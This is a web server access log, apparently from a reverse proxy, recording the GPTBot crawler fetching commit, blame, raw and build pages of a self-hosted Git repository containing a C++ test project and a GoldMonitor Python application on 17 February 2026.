"/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11321] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10266] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9978] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10238] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 25845] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:16:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 25729] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:16:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 25907] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:16:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 25747] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:16:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 32399] [Gzip 6.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:16:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 35871] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:16:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 36319] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:16:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 35747] [Gzip 7.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:16:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 25819] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:16:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 25796] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:16:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474022] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 491998] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492036] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492790] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492822] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474054] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492829] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12841] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:16:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 